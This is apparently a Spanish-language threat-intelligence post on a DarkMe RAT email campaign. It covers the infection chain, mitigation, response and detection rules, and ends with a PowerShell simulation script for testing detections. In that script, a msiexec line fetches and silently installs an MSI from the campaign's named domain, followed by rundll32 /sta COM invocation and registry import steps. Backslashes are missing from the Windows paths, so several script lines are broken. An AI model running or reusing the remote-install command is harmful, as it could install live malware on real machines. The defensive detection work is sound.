SOC Prime Bias: High

25 Sep 2026 08:20 UTC

La Campaña de Email DarkMe Amplía el Objetivo en Ataques APT RAT

Author Photo
SOC Prime Team linkedin icon Seguir
La Campaña de Email DarkMe Amplía el Objetivo en Ataques APT RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Se ha observado una nueva campaña que entrega el spyware-RAT DarkMe dependiendo de la ingeniería social en lugar de exploits de software. Los atacantes distribuyen un .pif archivo a través de correo electrónico, que inicia una cadena de infección multietapa involucrando MSIEXEC y varios cargadores basados en VB6. El alejamiento de la explotación de día cero hacia la ingeniería social de alto volumen sugiere un cambio hacia métodos de ataque más económicos, amplios y menos selectivos.

Investigación

Huntress identificó la campaña tras detectar un .pif archivo que lanza Windows Installer para recuperar un paquete MSI remoto. El análisis descubrió una compleja cadena multietapa que involucra un script de preparación llamado prnfig.wsf, importaciones de registro y ejecución de un objeto COM a través de rundll32.exe /sta. La etapa final utiliza vaciado de proceso para inyectar la carga de DarkMe en el binario firmado de Microsoft clspack.exe.

Mitigación

Los defensores deben monitorear rundll32.exe lanzado con la bandera /sta y un GUID sin una ruta DLL acompañante. Los equipos de seguridad también deben detectar msiexec recuperando paquetes MSI remotos a través de HTTPS e investigar la ejecución de .pif archivos. Los binarios firmados de Microsoft que se ejecutan desde ubicaciones inusuales como %AppData% deben recibir un escrutinio adicional.

Respuesta

Cuando se detecta actividad sospechosa, aísle inmediatamente el punto final afectado para interrumpir la comunicación C2 y prevenir la exfiltración de datos. Termine el proceso clspack.exe vacío y elimine los artefactos maliciosos de %AppData%ComponentsFolder and %AppData%Microsoft. Elimine la persistencia creada a través del manejador del protocolo de URL personalizado y la clave HKCU Run . Restablezca las credenciales de usuario afectadas y trate cualquier billetera de criptomonedas almacenada localmente como potencialmente comprometida.

Flujo de ataque

Todavía estamos actualizando esta parte.

Detecciones

Posibles Puntos de Persistencia [ASEPs – Colmena de Software/NTUSER] (vía evento de registro)

Equipo SOC Prime
24 Sep 2026

Extensión Inusual de Binario Ejecutable (vía creación de proceso)

Equipo SOC Prime
24 Sep 2026

LOLBAS WScript / CScript (vía creación de proceso)

Equipo SOC Prime
24 Sep 2026

Posible Intento de Instalación de Archivo MSI Remoto (vía línea de comandos)

Equipo SOC Prime
24 Sep 2026

Comando y Control Sospechoso por Solicitud DNS de Dominio de Nivel Superior (TLD) Inusual (vía dns)

Equipo SOC Prime
24 Sep 2026

IOCs (HashSha256) para detectar: La campaña de correo electrónico DarkMe amplía el objetivo para APT RAT

Reglas SOC Prime AI
24 Sep 2026

IOCs (SourceIP) para detectar: La campaña de correo electrónico DarkMe amplía el objetivo para APT RAT

Reglas SOC Prime AI
24 Sep 2026

IOCs (DestinationIP) para detectar: La campaña de correo electrónico DarkMe amplía el objetivo para APT RAT

Reglas SOC Prime AI
24 Sep 2026

Detectar Comunicación C2 y Dominio de Preparación para DarkMe RAT [Conexión de Red de Windows]

Reglas SOC Prime AI
24 Sep 2026

Detección de Actividades de la Campaña Maliciosa de DarkMe RAT [Creación de Proceso de Windows]

Reglas SOC Prime AI
24 Sep 2026

Ejecución de Simulación

  • Narrativa de Ataque y Comandos: El adversario apunta a desplegar el DarkMe RAT para mantener la persistencia. Para evadir la detección basada en firmas, el atacante utiliza msiexec para extraer una carga útil remota desde un dominio comprometido (onlineview365.com). Tras la infección inicial, el atacante utiliza rundll32.exe para invocar un objeto COM específico a través de un GUID para ejecutar código en memoria, y posteriormente usa cmd.exe para importar configuraciones de registro desde un archivo de texto para preparar el entorno para una ejecución de carga útil basada en wscript.exe .

  • Script de Prueba de Regresión:

    # Script de Simulación de DarkMe RAT
    # Este script simula las líneas de comando exactas definidas en la regla Sigma.
    
    Write-Host "[+] Iniciando Simulación de DarkMe RAT..." -ForegroundColor Cyan
    
    # 1. Simular descarga remota de msiexec
    Write-Host "[*] Simulando descarga remota de msiexec..."
    Start-Process msiexec.exe -ArgumentList "/i https://onlineview365.com/propi.msi /quiet /norestart" -ErrorAction SilentlyContinue
    
    # 2. Simular ejecución de objeto COM de rundll32
    Write-Host "[*] Simulando ejecución de COM de rundll32..."
    Start-Process rundll32.exe -ArgumentList "/sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}" -ErrorAction SilentlyContinue
    
    # 3. Simular importación de registro de cmd.exe
    Write-Host "[*] Simulando importación de registro de cmd.exe..."
    $tempFile = "$env:TEMPfiletext2.txt"
    "Windows Registry Editor Version 5.00`n[HKEY_CURRENT_USERSoftwareDarkMe]`n"Test"="Value"" | Out-File -FilePath $tempFile -Encoding ascii
    Start-Process cmd.exe -ArgumentList "/c reg.exe import ""$tempFile""" -Wait
    
    # 4. Simular ejecución de wscript.exe a través de la cadena padre cmd/rundll32
    Write-Host "[*] Simulando ejecución de wscript.exe desde AppData..."
    $scriptPath = "$env:APPDATAmalicious_script.vbs"
    "WScript.Echo `"DarkMe Simulated`"" | Out-File -FilePath $scriptPath -Encoding ascii
    
    # Para desencadenar la regla específica padre/hijo:
    # Padre: C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B}
    # Hijo: wscript.exe %AppData%malicious_script.vbs
    Start-Process cmd.exe -ArgumentList "/c C:WindowsSysWOW64rundll32.exe /sta {CFDC57BA-1705-45AF-BA10-EFC3D592982B} & wscript.exe ""$scriptPath""" -Wait
    
    Write-Host "[+] Simulación Completa." -ForegroundColor Green
  • Comandos de Limpieza:

    # Limpiar Artefactos de Simulación
    Write-Host "[+] Limpiando..." -ForegroundColor Yellow
    Remove-Item -Path "$env:TEMPfiletext2.txt" -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:APPDATAmalicious_script.vbs" -ErrorAction SilentlyContinue
    Write-Host "[+] Limpieza Finalizada." -ForegroundColor Green